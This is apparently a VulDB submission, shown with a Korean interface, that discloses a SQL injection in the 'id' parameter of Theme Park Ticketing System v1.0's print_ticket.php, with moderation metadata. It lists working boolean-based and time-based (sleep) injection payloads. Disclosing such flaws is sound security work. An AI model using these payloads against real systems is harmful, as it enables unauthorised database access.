| 제목 | Theme Park Ticketing System v1.0 /tpts/print_ticket.php GET parameter id exists SQL injection vulnerability |
|---|
| 설명 | Theme Park Ticketing System v1.0 has SQL injection.
Vulnerability File: /tpts/print_ticket.php
GET parameter 'id' exists SQL injection vulnerability
Payload1:id=1 AND 666=666
The Boolean value is judged correctly, so the page output is normal.
Payload2:id=1 AND 666=999
The Boolean value judgment is wrong, so the page output is abnormal.
Payload3:id=1 and (select 2 from (select(sleep(10)))c)
The time injection is successful, and the response from the server is 10 seconds. |
|---|
| 원천 | ⚠️ https://github.com/XIAONIGM/CVEReport/blob/main/SQL.md |
|---|
| 사용자 | dengbaihao (UID 47263) |
|---|
| 제출 | 2023. 05. 22. AM 05:19 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 05. 24. AM 11:39 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 229821 [SourceCodester Theme Park Ticketing System 1.0 GET Parameter print_ticket.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|